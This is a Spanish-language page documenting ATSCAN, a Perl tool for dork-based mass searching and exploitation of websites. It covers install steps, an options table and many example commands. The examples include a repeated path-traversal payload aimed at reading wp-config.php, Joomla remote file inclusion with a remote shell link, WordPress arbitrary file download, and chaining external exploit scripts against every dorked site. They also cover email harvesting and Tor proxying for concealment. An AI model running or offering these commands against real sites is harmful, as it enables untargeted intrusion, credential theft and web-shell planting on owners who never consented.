¡Alisam Technology no se hace responsable de ningún uso incorrecto, daño causado por este script o ataques contra objetivos sin el consentimiento mutuo previo!
Descripción:
● Motor de búsqueda Google / Bing / Ask / Yandex / Sogou
● Búsqueda masiva de Dork
● Múltiples escaneos instantáneos.
● Explotación de masas
● Utilizar proxy.
● Agente de usuario aleatorio.
● Motor aleatorio.
● Ejecución de comandos externos.
● Escáner XSS / SQLI / LFI / AFD.
● Filtrar los sitios de wordpress y Joomla en el servidor.
● Buscar página de administración.
● Decodificar / Codificar Base64 / MD5
● Exploración de puertos.
● Extraer IPs
● Extraer correos electrónicos.
● Detección automática de errores.
● Detección automática de Cms.
● Publicar datos.
● Repetidor de secuencia automática.
● Validación.
● Publicar y obtener el método
● Y más ...
Bibliotecas para instalar:
Requiere Perl.
Funciona en todas las plataformas. Disponible en sistemas Blackarch Linux y Dracos.
Descargar:
Permisos:
cd atscan
chmod + x ./atscan.pl
Instalación:
chmod + x ./install.sh
./install.sh
Ejecución:
Ejecución portátil: perl ./atscan.pl
Ejecución de la herramienta instalada: atscan
Herramienta de desinstalación:
atscan --uninstall
ScreenShots
Ayuda:
--help / -h / -?
|
Help.
|
--proxy
|
Set tor proxy for
scans [EX: --proxy "socks://localhost:9050"]
Set proxy [EX: --proxy "http://12.45.44.2:8080"] Set proxy list [EX: --proxy list.txt] |
-m
|
Set engine motors
default bing EX: -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All:
all]
|
--proxy-random
|
Random proxy [EX:
--proxy-random list.txt] or --proxy-random
"socks://localhost:9050"]
|
--m-random
|
Random of all
disponibles engines
|
--b-random
|
Random all
disponibles agents
|
--freq
|
Random time
frequency (in seconds)
|
--time
|
set browser time
out
|
--dork / -d
|
Dork to search
[Ex: house [OTHER]cars [OTHER]hotel]
|
-t
|
Target
|
--level / -l
|
Scan level (+-
Number of page results to scan)
|
-p
|
Set test
parameter EX:id,cat,product_ID
|
--save / -s
|
Output.
|
--content
|
Print request
content
|
--data
|
data. See
examples
|
--post
|
Use post method
|
--get
|
Use get method
|
--header
|
Set headers
|
--host
|
Domain name [Ex:
site.com]
|
--nobanner
|
Hide tool banner
|
--beep
|
Produce beep
sound if positive scan found.
|
--ifend
|
Produce beep
sound when scan process is finished.
|
--noinfo
|
Jump extra
results info.
|
--limit
|
Limit max
positive scan results.
|
--valid / -v
|
Validate by
string
|
--status
|
Validate by http
header status
|
--ifinurl
|
Get targets with
exact string matching
|
--sregex
|
Get targets with
exact regex matching
|
--unique
|
Get targets with
exact dork matching
|
--replace
|
String to replace
|
--with
|
String to replace
with
|
--full
|
--replace --full
Will replace all url parametres from string to the end
|
--payload
|
Use your own
payloads instead of tool ones
|
--exp
|
Exploit/Payload
|
--sql
|
Xss scan
|
--lfi
|
Local file
inclusion
|
--joomrfi
|
Scan for joomla
local file inclusion.
|
--shell
|
Shell link
[Ex: http://www.site.com/shell.txt]
|
--wpafd
|
Scan wordpress
sites for arbitery file download
|
--admin
|
Get site admin
page
|
--shost
|
Get site
subdomains
|
--tcp
|
TCP port
|
--udp
|
UDP port
|
--sites
|
Sites in the
server
|
--wp
|
Wordpress sites
in the server
|
--joom
|
Joomla sites in
the server
|
--upload
|
Get sites with
upload files in the server
|
--zip
|
Get sites with
zip files in the server
|
--md5
|
Convert to md5
|
--encode64
|
Encode base64
string
|
--decode64
|
decode base64
string
|
--TARGET
|
Will be replaced
by target in extern command
|
--HOST
|
Will be replaced
by host in extern command
|
--HOSTIP
|
Will be replaced
by host IP in extern command
|
--PORT
|
Will be replaced
by open port in extern command
|
--ip
|
Crawl to get Ips
|
--regex
|
Crawl to get
strings matching regex
|
--noquery
|
Remove string
value from Query url [ex: site.com/index.php?id=string]
|
--command /-c
|
Extern Command to
execute
|
--email
|
Get emails
|
rang(x-y)
|
EX: --exp
"/index.php?id=rang(1-9)" --sql OR -t
"site.com/index.php?id=rang(1-9)" --sql
site.com/index.php?id=1 -> 9. |
repeat(txt-y)
|
EX: --exp
"/index.php?id=repeat(../-9)wp-config.php" --sql OR -t
"site.com/index.php?id=../wp-config.php"
In site.com/index.php?id=../wp-config.php then site.com/index.php?id=../../wp-config.php 9 times |
[OTHER]
|
To separate
values ex: dork1 [OTHER]DORK2 [OTHER]DORK3
|
[DATA/DATAFILE]
|
To separate data
values ex: --data "name:username [DATA]email:xxxxxx
[DATA]pass:xxxxx/[DATAFILE]pass:file.txt"
|
--update
|
Update tool
|
--tool
|
Tool info.
|
--config
|
User
configuration.
|
--uninstall
|
Uninstall Tool.
|
Ejemplos:
PROXY:
Tor: --proxy [proxy] [Ex: --proxy socks://localhost:9050].
Proxy: Proxy: --proxy [proxy] Ex: http://12.32.1.5:8080
or --proxy list.txt Ex: --proxy my_proxies.txt
RANDOM:
Random proxy --proxy-random [proxy list.txt]
Random browser --b-random
Random engine --m-random
SET HEADERS:
atscan --dork [dork / dorks.txt] --level [level] --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1"
atscan -t target --data "name:userfile[DATAFILE]value:file.txt --post --header "Authorization:Basic YWRtaW46YWRtaW4 [OTHER]keep_alive:1"
SEARCH ENGINE:
Search: atscan --dork [dork> --level [level]
Search: atscan -d [dork> -l [level]
Set engine: atscan --dork [dork> --level [level] -m [Bing: 1][Google: 2][Ask: 3][Yandex: 4][Sogou: 5][All: all]
Set selective engines: atscan -d [dork> -l [level] -m 1,2,3..
Search with many dorks: atscan --dork [dork1 [OTHER]dork2 [OTHER]dork3> --level [level]
Search and rand: atscan -d [dork] -l [level] --exp "/index.php?id=rang(1-9)" --sql
Get Server sites: atscan -t [ip] --level [value] --sites
Get Server sites: atscan -t "[ip from]-[ip to]" --level [value] --sites
Get Server sites: atscan -t "ip1 [OTHER]ip2" --level [value] --sites
Get Server wordpress sites: atscan -t [ip] --level [value] --wp
Get Server joomla sites: atscan -t [ip] --level value] --joom
Get Server upload sites: atscan -t [ip] --level [value] --upload
Get Server zip sites files: atscan -t [ip] --level value] --zip
WP Arbitry File Download: atscan -t [ip] --level [[[value] --wpafd
Joomla RFI: atscan -t [ip] --level [10] --joomfri --shell [shell link]
Search + output: atscan --dork [dorks.txt] --level [level] --save
Search + get emails: atscan -d [dorks.txt] -l [level] --email
Search + get site emails: atscan --dork site:site.com --level [level] --email
Search + get ips: atscan --dork [dork] --level [level] --ip
REGULAR EXPRESSIONS:
Regex use: atscan [--dork [dork> / -t [target]] --level [level] --regex [regex]
IP: ((?:(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?)\.){ 3}(?:25[0-5]|2[0-4][0-9]|[01]?[0-9][0-9]?))
E-mails: '((([A-Za-z0-9]+_+)|([A-Za-z0-9]+\-+)|([A-Za-z0-9]+\.+)|([A-Za-z0-9]+\++))*[A-Za-z0-9]+@((\w+\-+)|(\w+\.))*\w{1,63}\.[a-zA-Z]{2,6})'
REPEATER:
atscan -t site.com?index.php?id=rang(1-10) --sql
atscan -t [target] --exp "/index.php?id=rang(1-10)" --sql
atscan -t [target] --exp "/index.php?id=repeat(../-9)wp-config.php"
PORTS
atscan -t [ip] --port [port] [--udp / --tcp]
atscan -t (ip start)-(ip end) --port [port] [--udp / --tcp]
atscan -t [ip] --port (port start)-(port end) [--udp / --tcp] --command "your extern command"
ENCODE / DECODE:
Generate MD5: --md5 [string]
Encode base64: --encode64 [string]
Decode base64: --decode64 [string]
DATA:
Post data: atscan -t [target] --data "field1:value1 [DATA]field2:value2 [DATA]field3:value3" [--post / --get]
Wordlist: atscan -t [target] --data "name:userfile [DATAFILE]value:file.txt" [--post / --get]
atscan -t [target] --data "username:john [DATA]pass:1234" [--post / --get]
Post + Validation: --data "name:userfile [DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]
EXTERNAL COMMANDES:
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --TARGET"
atscan --dork [dork / dorks.txt] --level [level] --command "curl -v --HOST"
atscan --dork [dork / dorks.txt] --level [level] --command "nmap -sV -p 21,22,80 --HOSTIP"
atscan -d "index of /lib/scripts/dl-skin.php" -l 20 -m 2 --command "php WP-dl-skin.php-exploit.php --TARGET"
MULTIPLE SCANS:
atscan --dork [dork> --level [10] --sql --lfi --wp ..
atscan --dork [dork> --level [10] --replace [string] --with [string] --exp [payload] [--sql / --lfi / --wp /...]
atscan -t [ip] --level [10] [--sql / --lfi / --wp /...]
atscan -t [target] [--sql / --lfi / --wp /...]
USER PAYLOADS:
atscan --dork [dork] --level [10] [--lfi | --sql ..] --payload [payload | payloads.txt]
SEARCH VALIDATION:
atscan -d [dork / dorks.txt] -l [level] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] --ifinurl [string]
atscan -d [dork / dorks.txt] -l [level] --regex [regex] --valid [string]
atscan -d [dork / dorks.txt] -l [level] --unique
SCAN VALIDATION:
atscan -t [target / targets.txt] [--status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] --exp [payload] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string]
atscan -d [dork / dorks.txt] -l [level] [--admin / --sql ..] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --full --status [code] / --valid [string]
atscan -d [dorks.txt] -l [level] --replace [string] --with [string] --exp [payload] --status [code] / --valid [string]
atscan --data "name:userfile[DATAFILE]value:file.txt" -v [string] / --status [code] [--post / --get]
atscan -d [dork / dorks.txt] -l [level] [--sql / --shost ..] --status [code] / --valid [string]
UPDATE TOOL:
atscan --update
UNINSTALL TOOL:
atscan --uninstall
0 Comentarios